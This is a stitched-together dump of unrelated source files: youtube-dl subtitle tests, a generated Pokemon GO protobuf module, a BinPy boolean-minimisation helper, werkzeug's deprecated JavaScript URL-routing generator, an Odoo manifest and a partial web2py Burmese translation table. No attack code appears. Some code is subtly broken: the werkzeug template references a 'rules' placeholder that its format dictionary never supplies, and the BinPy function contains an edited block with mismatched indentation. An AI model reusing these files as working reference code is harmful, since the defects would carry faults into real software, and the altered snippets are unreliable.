self.assertEqual(md5(subtitles['en']), '3cb210999d3e021bd6c7f0ea751eab06')
self.assertEqual(md5(subtitles['it']), '6d752b98c31f1cf8d597050c7a2cb4b5')
for lang in ['fr', 'de']:
self.assertTrue(subtitles.get(lang) is not None, 'Subtitles for \'%s\' not extracted' % lang)
def test_youtube_subtitles_ttml_format(self):
self.DL.params['writesubtitles'] = True
self.DL.params['subtitlesformat'] = 'ttml'
subtitles = self.getSubtitles()
self.assertEqual(md5(subtitles['en']), 'e306f8c42842f723447d9f63ad65df54')
def test_youtube_subtitles_vtt_format(self):
self.DL.params['writesubtitles'] = True
self.DL.params['subtitlesformat'] = 'vtt'
subtitles = self.getSubtitles()
self.assertEqual(md5(subtitles['en']), '3cb210999d3e021bd6c7f0ea751eab06')
def test_youtube_automatic_captions(self):
self.url = '8YoUxe5ncPo'
self.DL.params['writeautomaticsub'] = True
self.DL.params['subtitleslangs'] = ['it']
subtitles = self.getSubtitles()
self.assertTrue(subtitles['it'] is not None)
def test_youtube_translated_subtitles(self):
# This video has a subtitles track, which can be translated
self.url = 'Ky9eprVWzlI'
self.DL.params['writeautomaticsub'] = True
self.DL.params['subtitleslangs'] = ['it']
subtitles = self.getSubtitles()
self.assertTrue(subtitles['it'] is not None)
def test_youtube_nosubtitles(self):
self.DL.expect_warning('video doesn\'t have subtitles')
self.url = 'n5BB19UTcdA'
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertFalse(subtitles)
class TestDailymotionSubtitles(BaseTestSubtitles):
url = 'http://www.dailymotion.com/video/xczg00'
IE = DailymotionIE
def test_allsubtitles(self):
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertTrue(len(subtitles.keys()) >= 6)
self.assertEqual(md5(subtitles['en']), '976553874490cba125086bbfea3ff76f')
self.assertEqual(md5(subtitles['fr']), '594564ec7d588942e384e920e5341792')
for lang in ['es', 'fr', 'de']:
self.assertTrue(subtitles.get(lang) is not None, 'Subtitles for \'%s\' not extracted' % lang)
def test_nosubtitles(self):
self.DL.expect_warning('video doesn\'t have subtitles')
self.url = 'http://www.dailymotion.com/video/x12u166_le-zapping-tele-star-du-08-aout-2013_tv'
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertFalse(subtitles)
class TestTedSubtitles(BaseTestSubtitles):
url = 'http://www.ted.com/talks/dan_dennett_on_our_consciousness.html'
IE = TEDIE
def test_allsubtitles(self):
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertTrue(len(subtitles.keys()) >= 28)
self.assertEqual(md5(subtitles['en']), '4262c1665ff928a2dada178f62cb8d14')
self.assertEqual(md5(subtitles['fr']), '66a63f7f42c97a50f8c0e90bc7797bb5')
for lang in ['es', 'fr', 'de']:
self.assertTrue(subtitles.get(lang) is not None, 'Subtitles for \'%s\' not extracted' % lang)
class TestVimeoSubtitles(BaseTestSubtitles):
url = 'http://vimeo.com/76979871'
IE = VimeoIE
def test_allsubtitles(self):
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertEqual(set(subtitles.keys()), set(['de', 'en', 'es', 'fr']))
self.assertEqual(md5(subtitles['en']), '8062383cf4dec168fc40a088aa6d5888')
self.assertEqual(md5(subtitles['fr']), 'b6191146a6c5d3a452244d853fde6dc8')
def test_nosubtitles(self):
self.DL.expect_warning('video doesn\'t have subtitles')
self.url = 'http://vimeo.com/56015672'
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertFalse(subtitles)
class TestWallaSubtitles(BaseTestSubtitles):
url = 'http://vod.walla.co.il/movie/2705958/the-yes-men'
IE = WallaIE
def test_allsubtitles(self):
self.DL.expect_warning('Automatic Captions not supported by this server')
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertEqual(set(subtitles.keys()), set(['heb']))
self.assertEqual(md5(subtitles['heb']), 'e758c5d7cb982f6bef14f377ec7a3920')
def test_nosubtitles(self):
self.DL.expect_warning('video doesn\'t have subtitles')
self.url = 'http://vod.walla.co.il/movie/2642630/one-direction-all-for-one'
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertFalse(subtitles)
class TestCeskaTelevizeSubtitles(BaseTestSubtitles):
url = 'http://www.ceskatelevize.cz/ivysilani/10600540290-u6-uzasny-svet-techniky'
IE = CeskaTelevizeIE
def test_allsubtitles(self):
self.DL.expect_warning('Automatic Captions not supported by this server')
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertEqual(set(subtitles.keys()), set(['cs']))
self.assertTrue(len(subtitles['cs']) > 20000)
def test_nosubtitles(self):
self.DL.expect_warning('video doesn\'t have subtitles')
self.url = 'http://www.ceskatelevize.cz/ivysilani/ivysilani/10441294653-hyde-park-civilizace/214411058091220'
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertFalse(subtitles)
class TestLyndaSubtitles(BaseTestSubtitles):
url = 'http://www.lynda.com/Bootstrap-tutorials/Using-exercise-files/110885/114408-4.html'
IE = LyndaIE
def test_allsubtitles(self):
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertEqual(set(subtitles.keys()), set(['en']))
self.assertEqual(md5(subtitles['en']), '09bbe67222259bed60deaa26997d73a7')
class TestNPOSubtitles(BaseTestSubtitles):
url = 'http://www.npo.nl/nos-journaal/28-08-2014/POW_00722860'
IE = NPOIE
def test_allsubtitles(self):
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertEqual(set(subtitles.keys()), set(['nl']))
self.assertEqual(md5(subtitles['nl']), 'fc6435027572b63fb4ab143abd5ad3f4')
class TestMTVSubtitles(BaseTestSubtitles):
url = 'http://www.cc.com/video-clips/kllhuv/stand-up-greg-fitzsimmons--uncensored---too-good-of-a-mother'
IE = ComedyCentralIE
def getInfoDict(self):
return super(TestMTVSubtitles, self).getInfoDict()['entries'][0]
def test_allsubtitles(self):
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertEqual(set(subtitles.keys()), set(['en']))
self.assertEqual(md5(subtitles['en']), 'b9f6ca22a6acf597ec76f61749765e65')
class TestNRKSubtitles(BaseTestSubtitles):
url = 'http://tv.nrk.no/serie/ikke-gjoer-dette-hjemme/DMPV73000411/sesong-2/episode-1'
IE = NRKTVIE
def test_allsubtitles(self):
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertEqual(set(subtitles.keys()), set(['no']))
self.assertEqual(md5(subtitles['no']), '544fa917d3197fcbee64634559221cc2')
class TestRaiSubtitles(BaseTestSubtitles):
url = 'http://www.rai.tv/dl/RaiTV/programmi/media/ContentItem-cb27157f-9dd0-4aee-b788-b1f67643a391.html'
IE = RaiTVIE
def test_allsubtitles(self):
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertEqual(set(subtitles.keys()), set(['it']))
self.assertEqual(md5(subtitles['it']), 'b1d90a98755126b61e667567a1f6680a')
class TestVikiSubtitles(BaseTestSubtitles):
url = 'http://www.viki.com/videos/1060846v-punch-episode-18'
IE = VikiIE
def test_allsubtitles(self):
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertEqual(set(subtitles.keys()), set(['en']))
self.assertEqual(md5(subtitles['en']), '53cb083a5914b2d84ef1ab67b880d18a')
class TestThePlatformSubtitles(BaseTestSubtitles):
# from http://www.3playmedia.com/services-features/tools/integrations/theplatform/
# (see http://theplatform.com/about/partners/type/subtitles-closed-captioning/)
url = 'theplatform:JFUjUE1_ehvq'
IE = ThePlatformIE
def test_allsubtitles(self):
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertEqual(set(subtitles.keys()), set(['en']))
self.assertEqual(md5(subtitles['en']), '97e7670cbae3c4d26ae8bcc7fdd78d4b')
class TestThePlatformFeedSubtitles(BaseTestSubtitles):
url = 'http://feed.theplatform.com/f/7wvmTC/msnbc_video-p-test?form=json&pretty=true&range=-40&byGuid=n_hardball_5biden_140207'
IE = ThePlatformFeedIE
def test_allsubtitles(self):
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertEqual(set(subtitles.keys()), set(['en']))
self.assertEqual(md5(subtitles['en']), '48649a22e82b2da21c9a67a395eedade')
class TestRtveSubtitles(BaseTestSubtitles):
url = 'http://www.rtve.es/alacarta/videos/los-misterios-de-laura/misterios-laura-capitulo-32-misterio-del-numero-17-2-parte/2428621/'
IE = RTVEALaCartaIE
def test_allsubtitles(self):
print('Skipping, only available from Spain')
return
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertEqual(set(subtitles.keys()), set(['es']))
self.assertEqual(md5(subtitles['es']), '69e70cae2d40574fb7316f31d6eb7fca')
class TestFunnyOrDieSubtitles(BaseTestSubtitles):
url = 'http://www.funnyordie.com/videos/224829ff6d/judd-apatow-will-direct-your-vine'
IE = FunnyOrDieIE
def test_allsubtitles(self):
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertEqual(set(subtitles.keys()), set(['en']))
self.assertEqual(md5(subtitles['en']), 'c5593c193eacd353596c11c2d4f9ecc4')
class TestDemocracynowSubtitles(BaseTestSubtitles):
url = 'http://www.democracynow.org/shows/2015/7/3'
IE = DemocracynowIE
def test_allsubtitles(self):
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertEqual(set(subtitles.keys()), set(['en']))
self.assertEqual(md5(subtitles['en']), 'acaca989e24a9e45a6719c9b3d60815c')
def test_subtitles_in_page(self):
self.url = 'http://www.democracynow.org/2015/7/3/this_flag_comes_down_today_bree'
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertEqual(set(subtitles.keys()), set(['en']))
self.assertEqual(md5(subtitles['en']), 'acaca989e24a9e45a6719c9b3d60815c')
if __name__ == '__main__':
unittest.main()
|
earshel/PokeyPySnipe | refs/heads/master | POGOProtos/Data/Player/PlayerCamera_pb2.py | 16 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: POGOProtos/Data/Player/PlayerCamera.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='POGOProtos/Data/Player/PlayerCamera.proto',
package='POGOProtos.Data.Player',
syntax='proto3',
serialized_pb=_b('\n)POGOProtos/Data/Player/PlayerCamera.proto\x12\x16POGOProtos.Data.Player\")\n\x0cPlayerCamera\x12\x19\n\x11is_default_camera\x18\x01 \x01(\x08\x62\x06proto3')
)
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_PLAYERCAMERA = _descriptor.Descriptor(
name='PlayerCamera',
full_name='POGOProtos.Data.Player.PlayerCamera',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='is_default_camera', full_name='POGOProtos.Data.Player.PlayerCamera.is_default_camera', index=0,
number=1, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=69,
serialized_end=110,
)
DESCRIPTOR.message_types_by_name['PlayerCamera'] = _PLAYERCAMERA
PlayerCamera = _reflection.GeneratedProtocolMessageType('PlayerCamera', (_message.Message,), dict(
DESCRIPTOR = _PLAYERCAMERA,
__module__ = 'POGOProtos.Data.Player.PlayerCamera_pb2'
# @@protoc_insertion_point(class_scope:POGOProtos.Data.Player.PlayerCamera)
))
_sym_db.RegisterMessage(PlayerCamera)
# @@protoc_insertion_point(module_scope)
|
rajathkumarmp/BinPy | refs/heads/develop | BinPy/algorithms/makebooleanfunction.py | 5 | from BinPy.algorithms.ExpressionConvert import *
from BinPy.algorithms.QuineMcCluskey import *
import sys
def make_boolean(vars, min_max, dont_care=None, **kwargs):
"""
A function which takes in minterms/maxterms and
returns the Boolean Function and implementable form
Don't Care Conditions can also be provided (optional)
Examples
========
>>> from BinPy import *
>>> le, gf = make_boolean(['A', 'B', 'C'], [1, 4, 7], minterms=True)
>>> le
'((A AND (NOT B) AND (NOT C)) OR (A AND B AND C) OR ((NOT A) AND (NOT B) AND C))'
>>> gf
'OR(AND(A, NOT(B), NOT(C)), AND(A, B, C), AND(NOT(A), NOT(B), C))'
"""
    ones = []
    if kwargs.get('minterms') is True:
        ones = min_max
        if ones[-1] >= pow(2, len(vars)):
            raise Exception("Error: Invalid minterms")
    elif kwargs.get('maxterms') is True:
        zeros = min_max
        if zeros[-1] >= pow(2, len(vars)):
            raise Exception("Error: Invalid maxterms")
        for i in range(pow(2, len(vars))):
            if i not in zeros:
                ones.append(i)
    else:
        # The original `while True` loop spun forever when neither keyword
        # was supplied; fail fast instead.
        raise Exception("Error: pass either minterms=True or maxterms=True")
if dont_care is not None:
_dont_care = list(map(int, dont_care))
qm = QM(vars)
if dont_care is not None:
LogicalExpression = qm.get_function(qm.solve(ones, _dont_care)[1])
else:
LogicalExpression = qm.get_function(qm.solve(ones)[1])
GateForm = convertExpression(LogicalExpression)
return LogicalExpression, GateForm
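# Illustrative usage sketch (an addition, not part of the original BinPy
# module); the chosen terms are arbitrary examples.
if __name__ == '__main__':
    # F(A, B, C) with minterms 1, 4, 7 and don't-care terms 2, 5
    le, gf = make_boolean(['A', 'B', 'C'], [1, 4, 7],
                          dont_care=[2, 5], minterms=True)
    print(le)  # simplified logical expression
    print(gf)  # gate-level (implementable) form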
|
eivantsov/flask | refs/heads/master | lib/werkzeug/contrib/jsrouting.py | 318 | # -*- coding: utf-8 -*-
"""
werkzeug.contrib.jsrouting
~~~~~~~~~~~~~~~~~~~~~~~~~~
Addon module that allows to create a JavaScript function from a map
that generates rules.
:copyright: (c) 2013 by the Werkzeug Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
try:
from simplejson import dumps
except ImportError:
try:
from json import dumps
except ImportError:
def dumps(*args):
raise RuntimeError('simplejson required for jsrouting')
from inspect import getmro
from werkzeug.routing import NumberConverter
from werkzeug._compat import iteritems
def render_template(name_parts, rules, converters):
result = u''
if name_parts:
for idx in xrange(0, len(name_parts) - 1):
name = u'.'.join(name_parts[:idx + 1])
result += u"if (typeof %s === 'undefined') %s = {}\n" % (name, name)
result += '%s = ' % '.'.join(name_parts)
result += """(function (server_name, script_name, subdomain, url_scheme) {
    var converters = [%(converters)s];
    var rules = %(rules)s;
function in_array(array, value) {
if (array.indexOf != undefined) {
return array.indexOf(value) != -1;
}
for (var i = 0; i < array.length; i++) {
if (array[i] == value) {
return true;
}
}
return false;
}
function array_diff(array1, array2) {
array1 = array1.slice();
for (var i = array1.length-1; i >= 0; i--) {
if (in_array(array2, array1[i])) {
array1.splice(i, 1);
}
}
return array1;
}
function split_obj(obj) {
var names = [];
var values = [];
for (var name in obj) {
if (typeof(obj[name]) != 'function') {
names.push(name);
values.push(obj[name]);
}
}
return {names: names, values: values, original: obj};
}
function suitable(rule, args) {
var default_args = split_obj(rule.defaults || {});
var diff_arg_names = array_diff(rule.arguments, default_args.names);
for (var i = 0; i < diff_arg_names.length; i++) {
if (!in_array(args.names, diff_arg_names[i])) {
return false;
}
}
if (array_diff(rule.arguments, args.names).length == 0) {
if (rule.defaults == null) {
return true;
}
for (var i = 0; i < default_args.names.length; i++) {
var key = default_args.names[i];
var value = default_args.values[i];
if (value != args.original[key]) {
return false;
}
}
}
return true;
}
function build(rule, args) {
var tmp = [];
var processed = rule.arguments.slice();
for (var i = 0; i < rule.trace.length; i++) {
var part = rule.trace[i];
if (part.is_dynamic) {
var converter = converters[rule.converters[part.data]];
var data = converter(args.original[part.data]);
if (data == null) {
return null;
}
tmp.push(data);
processed.push(part.name);
} else {
tmp.push(part.data);
}
}
tmp = tmp.join('');
var pipe = tmp.indexOf('|');
var subdomain = tmp.substring(0, pipe);
var url = tmp.substring(pipe+1);
var unprocessed = array_diff(args.names, processed);
var first_query_var = true;
for (var i = 0; i < unprocessed.length; i++) {
if (first_query_var) {
url += '?';
} else {
url += '&';
}
first_query_var = false;
url += encodeURIComponent(unprocessed[i]);
url += '=';
url += encodeURIComponent(args.original[unprocessed[i]]);
}
return {subdomain: subdomain, path: url};
}
function lstrip(s, c) {
while (s && s.substring(0, 1) == c) {
s = s.substring(1);
}
return s;
}
function rstrip(s, c) {
while (s && s.substring(s.length-1, s.length) == c) {
s = s.substring(0, s.length-1);
}
return s;
}
return function(endpoint, args, force_external) {
args = split_obj(args);
var rv = null;
for (var i = 0; i < rules.length; i++) {
var rule = rules[i];
if (rule.endpoint != endpoint) continue;
if (suitable(rule, args)) {
rv = build(rule, args);
if (rv != null) {
break;
}
}
}
if (rv == null) {
return null;
}
if (!force_external && rv.subdomain == subdomain) {
return rstrip(script_name, '/') + '/' + lstrip(rv.path, '/');
} else {
return url_scheme + '://'
+ (rv.subdomain ? rv.subdomain + '.' : '')
+ server_name + rstrip(script_name, '/')
+ '/' + lstrip(rv.path, '/');
}
};
})""" % {'converters': u', '.join(converters)}
return result
def generate_map(map, name='url_map'):
"""
Generates a JavaScript function containing the rules defined in
this map, to be used with a MapAdapter's generate_javascript
method. If you don't pass a name the returned JavaScript code is
an expression that returns a function. Otherwise it's a standalone
script that assigns the function with that name. Dotted names are
resolved (so you an use a name like 'obj.url_for')
In order to use JavaScript generation, simplejson must be installed.
Note that using this feature will expose the rules
defined in your map to users. If your rules contain sensitive
information, don't use JavaScript generation!
"""
from warnings import warn
warn(DeprecationWarning('This module is deprecated'))
map.update()
rules = []
converters = []
for rule in map.iter_rules():
trace = [{
'is_dynamic': is_dynamic,
'data': data
} for is_dynamic, data in rule._trace]
rule_converters = {}
for key, converter in iteritems(rule._converters):
js_func = js_to_url_function(converter)
try:
index = converters.index(js_func)
except ValueError:
converters.append(js_func)
index = len(converters) - 1
rule_converters[key] = index
rules.append({
u'endpoint': rule.endpoint,
u'arguments': list(rule.arguments),
u'converters': rule_converters,
u'trace': trace,
u'defaults': rule.defaults
})
return render_template(name_parts=name and name.split('.') or [],
rules=dumps(rules),
converters=converters)
def generate_adapter(adapter, name='url_for', map_name='url_map'):
"""Generates the url building function for a map."""
values = {
u'server_name': dumps(adapter.server_name),
u'script_name': dumps(adapter.script_name),
u'subdomain': dumps(adapter.subdomain),
u'url_scheme': dumps(adapter.url_scheme),
u'name': name,
u'map_name': map_name
}
return u'''\
var %(name)s = %(map_name)s(
%(server_name)s,
%(script_name)s,
%(subdomain)s,
%(url_scheme)s
);''' % values
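# Illustrative usage sketch (an addition, not part of the original module).
# The map below is a minimal assumption; any werkzeug Map works:
#
#   from werkzeug.routing import Map, Rule
#   url_map = Map([Rule('/user/<int:id>', endpoint='user')])
#   js_map = generate_map(url_map, name='url_map')
#   js_url_for = generate_adapter(url_map.bind('example.com'))
#   # Serving js_map followed by js_url_for to the browser exposes
#   # url_for('user', {id: 42}) on the client side.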
def js_to_url_function(converter):
"""Get the JavaScript converter function from a rule."""
if hasattr(converter, 'js_to_url_function'):
data = converter.js_to_url_function()
else:
for cls in getmro(type(converter)):
if cls in js_to_url_functions:
data = js_to_url_functions[cls](converter)
break
else:
return 'encodeURIComponent'
return '(function(value) { %s })' % data
def NumberConverter_js_to_url(conv):
if conv.fixed_digits:
return u'''\
var result = value.toString();
while (result.length < %s)
result = '0' + result;
return result;''' % conv.fixed_digits
return u'return value.toString();'
js_to_url_functions = {
NumberConverter: NumberConverter_js_to_url
}
|
erkrishna9/odoo | refs/heads/master | addons/website_event/__openerp__.py | 68 | # -*- coding: utf-8 -*-
{
'name': 'Online Events',
'category': 'Website',
'summary': 'Schedule, Promote and Sell Events',
'version': '1.0',
'description': """
Online Events
""",
'author': 'OpenERP SA',
'depends': ['website', 'website_partner', 'website_mail', 'event'],
'data': [
'data/event_data.xml',
'views/website_event.xml',
'views/website_event_sale_backend.xml',
'security/ir.model.access.csv',
'security/website_event.xml',
],
'qweb': ['static/src/xml/*.xml'],
'demo': [
'data/event_demo.xml'
],
'installable': True,
'application': True,
}
|
InstitutoPascal/Staff | refs/heads/master | languages/my-mm.py | 85 | # -*- coding: utf-8 -*-
{
'!langcode!': 'my-mm',
'!langname!': 'မြန်မာ',
'"update" is an optional expression like "field1=\'newvalue\'". You cannot update or delete the results of a JOIN': '"update" is an optional expression like "field1=\'newvalue\'". You cannot update or delete the results of a JOIN',
'%s %%{row} deleted': '%s %%{row} ဖျက်ပြီးပြီ',
'%s %%{row} updated': '%s %%{row} ပြင်ပြီးပြီ',
'%s selected': '%s ခု ရွေးထားသည်',
'%Y-%m-%d': '%Y-%m-%d',
'%Y-%m-%d %H:%M:%S': '%Y-%m-%d %H:%M:%S',
'(requires internet access, experimental)': '(requires internet access, experimental)',
'(something like "it-it")': '(something like "it-it")',
'@markmin\x01An error occured, please [[reload %s]] the page': 'An error occured, please [[reload %s]] the page',
'About': 'အကြောင်း',
'Access Control': 'အသုံးပြု ခြင်းဆိုင်ရာ ထိန်းချုပ်ရန်',
'Additional code for your application': 'Additional code for your application',
'Admin language': 'Admin language',
'administrative interface': 'administrative interface',
'Administrative Interface': 'စီမံခန့်ခွဲရာ အင်တာဖေ့စ်',
'Administrator Password:': 'Administrator Password:',
'Ajax Recipes': 'Ajax Recipes',
'and rename it:': 'and rename it:',
'appadmin is disabled because insecure channel': 'စိတ်မချရသော လမ်းကြောင်းမှ ဝင်ရောက်သဖြင့် appadmin ကို အသုံးပြု၍ မရပါ',
'Application name:': 'Application name:',
'are not used': 'အသုံးမပြုပါ',
'are not used yet': 'အသုံးမပြုသေးပါ',
'Are you sure you want to delete this object?': 'သင် ဒီအရာ ဖျက်ရန် သေချာပါသလား။',
'Available Databases and Tables': 'အသုံးပြုနိုင်သော ဒေတာဘေစ့်များနှင့် ဇယားများ',
'Buy this book': 'ဒီစာအုပ်ကို ဝယ်ပါ',
'cache': 'cache',
'Cache': 'Cache',
'Cache Keys': 'Cache Keys',
'can be a git repo': 'can be a git repo',
'Cannot be empty': 'အလွတ် မဖြစ်ရပါ',
'Change admin password': 'Change admin password',
'Check to delete': 'ဖျက်ရန် စစ်ဆေးပါ',
'Checking for upgrades...': 'အဆင့်မြှင့်တင်မှုများအတွက် စစ်ဆေးနေသည် ...',
'Clean': 'ရှင်းလင်းရန်',
'Clear CACHE?': 'CACHE ကို ရှင်းလင်းမည်မှာ ဟုတ်ပါသလား။',
'Clear DISK': 'DISK ကို ရှင်းလင်းမည်။',
'Clear RAM': 'RAM ကို ရှင်းလင်းမည်။',
'Client IP': 'Client IP',
'collapse/expand all': 'collapse/expand all',
'Community': 'အသိုင်းအဝိုင်း',
'Compile': 'Compile',
'Components and Plugins': 'Components and Plugins',
'Controller': 'ကွန်ထရိုလာ',
'Controllers': 'ကွန်ထရိုလာများ',
'controllers': 'controllers',
'Copyright': 'မူပိုင်ခွင့်',
'Create': 'ဖန်တီးရန်',
'create file with filename:': 'create file with filename:',
'Create/Upload': 'Create/Upload',
'created by': 'ဖန်းတီးသူ',
'Created By': 'ပြုလုပ်ဖန်တီးသူ',
'Created On': 'ပြုလုပ်ဖန်တီးသည့်အချိန်',
'crontab': 'crontab',
'Current request': 'Current request',
'Current response': 'Current response',
'Current session': 'Current session',
'currently running': 'လက်ရှိတွင် လုပ်ဆောင်နေသည်',
'data uploaded': 'data uploaded',
'Database': 'ဒေတာဘေစ့်',
'Database %s select': 'Database %s select',
'database administration': 'ဒေတာဘေ့(စ်) စီမံခန့်ခွဲခြင်း',
'Database Administration (appadmin)': 'ဒေတာဘေစ့် စီမံခန့်ခွဲခြင်း (appadmin)',
'db': 'db',
'DB Model': 'DB Model',
'Debug': 'အမှားရှာရန်',
'Delete this file (you will be asked to confirm deletion)': 'Delete this file (you will be asked to confirm deletion)',
'Delete:': 'Delete:',
'Demo': 'အစမ်း၊ သရုပ်ပြမှုများ',
'Deploy': 'Deploy',
'Deploy on Google App Engine': 'Deploy on Google App Engine',
'Deploy to OpenShift': 'Deploy to OpenShift',
'Deployment Recipes': 'Deployment Recipes',
'Description': 'ဖော်ပြချက်',
'design': 'design',
'direction: ltr': 'direction: ltr',
'Disable': 'ပိတ်ရန်',
'DISK': 'DISK',
'Disk Cache Keys': 'Disk Cache Keys',
'Disk Cleared': 'Disk ရှင်းလင်းပြီးပြီ',
'Documentation': 'စာရွက်စာတမ်း အထောက်အကူများ',
"Don't know what to do?": 'ဘာလုပ်ရမည်မသိ ဖြစ်နေပါသလား။',
'done!': 'လုပ်ငန်း ဆောင်ရွက်ပြီးပြီ!',
'Download': 'Download',
'Download layouts from repository': 'Download layouts from repository',
'Download plugins from repository': 'Download plugins from repository',
'E-mail': 'အီးမေးလ်',
'Edit': 'ပြင်ဆင်ရန်',
'Edit application': 'Application ကို ပြင်ရန်',
'Edit current record': 'လက်ရှိ မှတ်တမ်းကို ပြင်ရန်',
'Email and SMS': 'အီးမေးလ်နှင့် SMS',
'Enable': 'ဖွင့်ရန်',
'enter an integer between %(min)g and %(max)g': 'enter an integer between %(min)g and %(max)g',
'Errors': 'အမှားများ',
'export as csv file': ' csv file အနေနဲ့ ထုတ်ပေးရန်',
'exposes': 'exposes',
'extends': 'extends',
'FAQ': 'ဖြစ်လေ့ရှိသော ပြဿနာများ',
'filter': 'filter',
'First name': 'အမည်၏ ပထမဆုံး စာလုံး',
'Forms and Validators': 'Forms and Validators',
'Free Applications': 'အခမဲ့ Applications',
'graph model': 'graph model',
'Graph Model': 'Graph Model',
'Group ID': 'Group ID',
'Groups': 'အဖွဲ့များ',
'Hello World': 'မင်္ဂလာပါ ကမ္ဘာကြီး။',
'Help': 'အကူအညီ',
'Home': 'မူလသို့',
'How did you get here?': 'သင် ဘယ်လို ရောက်လာခဲ့သလဲ။',
'import': 'သွင်းယူရန်',
'Import/Export': 'သွင်းယူရန်/ထုတ်ယူရန်',
'includes': 'includes',
'Install': 'Install',
'Installed applications': 'ထည့်သွင်းပြီး application များ',
'Internal State': 'Internal State',
'Introduction': 'မိတ်ဆက်',
'Invalid email': 'အီးမေးလ် ဖြည့်သွင်းမှုမှားနေသည်',
'Invalid Query': 'Invalid Query',
'invalid request': 'invalid request',
'Is Active': 'Is Active',
'Key': 'Key',
'Language': 'ဘာသာစကား',
'languages': 'ဘာသာစကားများ',
'Languages': 'ဘာသာစကားများ',
'Last name': 'မျိုးနွယ်အမည်',
'Layout': 'အပြင်အဆင်',
'Layout Plugins': 'Layout Plugins',
'Layouts': 'အပြင်အဆင်များ',
'Live Chat': 'တိုက်ရိုက် ဆက်သွယ် ပြောကြားရန်',
'Login': 'ဝင်ရောက်အသုံးပြုရန်',
'Login to the Administrative Interface': 'Login to the Administrative Interface',
'Logout': 'ထွက်ရန်',
'Lost Password': 'စကားဝှက် မသိတော့ပါ',
'Lost password?': 'စကားဝှက် မသိတော့ဘူးလား။',
'Manage': 'စီမံခန့်ခွဲရန်',
'Manage %(action)s': '%(action)s ကို စီမံရန်',
'Manage Access Control': 'အသုံးပြုခြင်းဆိုင်ရာ ထိန်းချုပ်မှု စီမံခန့်ခွဲရန်',
'Manage Cache': 'Manage Cache',
'Memberships': 'အသင်းဝင်များ',
'Menu Model': 'Menu Model',
'models': 'models',
'Models': 'Models',
'Modified By': 'ပြင်ဆင်မွမ်းမံသူ',
'Modified On': 'ပြင်ဆင်မွမ်းမံသည့် အချိန်',
'Modules': 'Modules',
'modules': 'modules',
'My Sites': 'ကျွန်ုပ်၏ Site များ',
'Name': 'အမည်',
'New application wizard': 'New application wizard',
'New Record': 'မှတ်တမ်း အသစ်',
'new record inserted': 'မှတ်တမ်း အသစ် ဖြည့်သွင်းပြီးပြီ',
'New simple application': 'ရိုးရိုး application အသစ်',
'next %s rows': 'နောက်အတန်း %s တန်း',
'No databases in this application': 'ဒီ application တွင် မည်သည့် ဒေတာဘေစ့်မှ မရှိပါ',
'no package selected': 'no package selected',
'Object or table name': 'Object or table name',
'Online examples': 'အွန်လိုင်း နမူနာများ',
'or alternatively': 'or alternatively',
'Or Get from URL:': 'Or Get from URL:',
'or import from csv file': 'or import from csv file',
'Origin': 'မူလ အစ',
'Other Plugins': 'အခြား Plugins',
'Other Recipes': 'အခြား Recipes',
'Overview': 'အပေါ်ယံရှုမြင်ခြင်း',
'Overwrite installed app': 'Overwrite installed app',
'Pack all': 'အားလုံးကို ထုပ်ပိုးရန်',
'Pack custom': 'ရွေးချယ်ထုပ်ပိုးရန်',
'Password': 'စကားဝှက်',
"Password fields don't match": 'စကားဝှက်များ ကိုက်ညီမှု မရှိပါ',
'Permission': 'ခွင့်ပြုချက်',
'Permissions': 'ခွင့်ပြုချက်များ',
